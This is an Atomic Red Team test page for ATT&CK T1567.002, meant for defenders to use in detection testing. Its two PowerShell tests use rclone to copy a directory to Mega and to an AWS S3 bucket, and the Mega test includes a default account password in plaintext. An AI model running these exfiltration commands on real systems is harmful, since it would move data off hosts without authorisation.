T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage
Description from ATT&CK (opens in a new tab)
Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.
Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.
Atomic Tests
-
Atomic Test #1 - Exfiltrate data with rclone to cloud Storage - Mega (Windows)
-
Atomic Test #2 - Exfiltrate data with rclone to cloud Storage - AWS S3
Atomic Test #1 - Exfiltrate data with rclone to cloud Storage - Mega (Windows)
This test uses rclone to exfiltrate data to a remote cloud storage instance. (Mega) See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/ (opens in a new tab)
Supported Platforms: Windows
auto_generated_guid: 8529ee44-279a-4a19-80bf-b846a40dda58
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
rclone_path | Directory of rclone.exe | path | PathToAtomicsFolder\..\ExternalPayloads\T1567.002\rclone-v*\ |
rclone_config_path | Path to rclone's config file (default should be fine) | path | $env:appdata |
dir_to_copy | Directory to copy | string | PathToAtomicsFolder\..\ExternalPayloads\T1567.002 |
mega_user_account | Mega user account | string | atomictesting@outlook.com |
mega_user_password | Mega user password | string | vmcjt1A_LEMKEXXy0CKFoiFCEztpFLcZVNinHA |
remote_share | Remote Mega share | string | T1567002 |
Attack Commands: Run with powershell
!
New-Item #{rclone_config_path}\rclone -ItemType directory
New-Item #{rclone_config_path}\rclone\rclone.conf
cd "#{rclone_path}"
.\rclone.exe config create #{remote_share} mega
set-Content #{rclone_config_path}\rclone\rclone.conf "[#{remote_share}] `n type = mega `n user = #{mega_user_account} `n pass = #{mega_user_password}"
.\rclone.exe copy --max-size 1700k "#{dir_to_copy}" #{remote_share}:test -v
Cleanup Commands:
cd "#{rclone_path}"
.\rclone.exe purge #{remote_share}:test
.\rclone.exe config delete #{remote_share}:
Remove-Item #{rclone_config_path}\rclone -recurse -force -erroraction silentlycontinue
cd c:\
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\rclone.zip"
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\T1567.002" -recurse -force
Dependencies: Run with powershell
!
Description: rclone must exist at (#{rclone_path})
Check Prereq Commands:
if (Test-Path "#{rclone_path}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\rclone.zip"
Expand-archive -path "PathToAtomicsFolder\..\ExternalPayloads\rclone.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\T1567.002\" -force
Atomic Test #2 - Exfiltrate data with rclone to cloud Storage - AWS S3
This test uses rclone to exfiltrate data to a remote cloud storage instance. (AWS S3) See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/ (opens in a new tab)
Supported Platforms: Linux, macOS
auto_generated_guid: a4b74723-5cee-4300-91c3-5e34166909b4
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
rclone_path | Directory of rclone.exe | path | PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone-v*/ |
exfil_directory | Directory to exfiltrate | string | PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/ |
terraform_path | Directory of terraform | path | PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v* |
aws_access_key | AWS Access Key | string | |
aws_secret_key | AWS Secret Key | string | |
aws_region | AWS Region | string | us-east-1 |
aws_profile | AWS Profile | string | default |
Attack Commands: Run with powershell
!
Write-Host "Deploying AWS infrastructure... " -NoNewLine
$awsAccessKey = "#{aws_access_key}"
$awsSecretKey = "#{aws_secret_key}"
cd PathToAtomicsFolder/T1567.002/src/
if ($awsAccessKey -eq "" -or $awsSecretKey -eq "") {
$env:AWS_PROFILE = "#{aws_profile}"
} else {
$env:AWS_ACCESS_KEY_ID = "$awsAccessKey"
$env:AWS_SECRET_ACCESS_KEY = "$awsSecretKey"
}
$null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform init
$null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform apply -var "aws_region=#{aws_region}" -auto-approve
Write-Host "Done!"
Write-Host "Generating rclone config... " -NoNewLine
$config = @"
[exfils3]
type = s3
provider = AWS
env_auth = true
region = #{aws_region}
"@
$config | Out-File -FilePath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf" -Encoding ascii
Write-Host "Done!"
Write-Host "Exfiltrating data... " -NoNewLine
$bucket = "$(PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform output bucket)".Replace("`"","")
cd PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone-v*
$null = ./rclone copy --max-size 1700k "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/" exfils3:$bucket --config "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf"
Write-Host "Done!"
Cleanup Commands:
Write-Host "Destroying AWS infrastructure... " -NoNewLine
$awsAccessKey = "#{aws_access_key}"
$awsSecretKey = "#{aws_secret_key}"
cd PathToAtomicsFolder/T1567.002/src/
if ($awsAccessKey -eq "" -or $awsSecretKey -eq "") {
$env:AWS_PROFILE = "#{aws_profile}"
} else {
$env:AWS_ACCESS_KEY_ID = "$awsAccessKey"
$env:AWS_SECRET_ACCESS_KEY = "$awsSecretKey"
}
$null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform destroy -var "aws_region=#{aws_region}" -auto-approve
Write-Host "Done!"
Dependencies: Run with powershell
!
Description: rclone must exist at (#{rclone_path})
Check Prereq Commands:
if (Test-Path "#{rclone_path}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/" -ErrorAction Ignore -Force | Out-Null
$arch = ([System.Runtime.InteropServices.RuntimeInformation]::OSArchitecture).ToString().ToLower()
$operatingSystem = ([System.Runtime.InteropServices.RuntimeInformation]::OSDescription).ToString().ToLower()
if ($operatingSystem -match "darwin") {
Invoke-WebRequest "https://downloads.rclone.org/rclone-current-osx-$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/rclone.zip"
} elseif ($operatingSystem -match "linux") {
Invoke-WebRequest "https://downloads.rclone.org/rclone-current-linux-$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/rclone.zip"
}
Expand-archive -path "PathToAtomicsFolder/../ExternalPayloads/rclone.zip" -DestinationPath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/" -force
Description: terraform must exist at (#{terraform_path})
Check Prereq Commands:
if (Test-Path "#{terraform_path}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/" -ErrorAction Ignore -Force | Out-Null
$arch = ([System.Runtime.InteropServices.RuntimeInformation]::OSArchitecture).ToString().ToLower()
$operatingSystem = ([System.Runtime.InteropServices.RuntimeInformation]::OSDescription).ToString().ToLower()
if ($operatingSystem -match "darwin") {
Invoke-WebRequest "https://releases.hashicorp.com/terraform/1.10.5/terraform_1.10.5_darwin_$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/terraform.zip"
} elseif ($operatingSystem -match "linux") {
Invoke-WebRequest "https://releases.hashicorp.com/terraform/1.10.5/terraform_1.10.5_linux_$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/terraform.zip"
}
Expand-archive -path "PathToAtomicsFolder/../ExternalPayloads/terraform.zip" -DestinationPath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v1.10.5/" -force
Description: Must provide a valid directory or file path to exfiltrate to AWS S3
Check Prereq Commands:
if (Test-Path "#{exfil_directory}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data" -ErrorAction Ignore -Force | Out-Null
foreach($fileSuffix in 1..10) {
Set-Content "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/test$fileSuffix.txt" "This is a test file"
}